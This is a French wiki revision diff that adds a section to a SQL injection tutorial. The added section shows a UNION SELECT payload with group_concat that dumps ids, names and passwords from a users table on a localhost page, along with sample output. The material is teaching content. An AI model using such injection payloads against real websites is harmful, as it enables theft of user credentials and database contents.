Cette page vous donne les différences entre la révision choisie et la version actuelle de la page.
failles_web:sql_injection [2012/06/25 23:25] TheLizardKing |
failles_web:sql_injection [2017/04/09 15:33] (Version actuelle) |
||
---|---|---|---|
Ligne 197: | Ligne 197: | ||
id,name,password | id,name,password | ||
</code> | </code> | ||
+ | |||
+ | ==== Informations d'une table ==== | ||
+ | |||
+ | Nous possédons toutes les données nécessaire pour extraire des informations intéressante de la base de donnée. En l'occurrence les informations des utilisateurs. | ||
+ | |||
+ | <code> | ||
+ | http://localhost/index.php?id=-1 UNION SELECT 1,2,group_concat(id,0x202D20,name,0x202D20,password) FROM users | ||
+ | </code> | ||
+ | |||
+ | <code>1 - administrateur - SuperPass</code> | ||
+ | |||
+ | Ici, chaque tuple de la table //users// sera affiché et séparé par une virgule. Le //group_concat// réalise cette opération. Chaque tuple est affiché sous la forme //id - name - password//. Le //0x202D20// correspond en fait à l'espace et au tiret qui sépare chaque colonne. | ||
+ |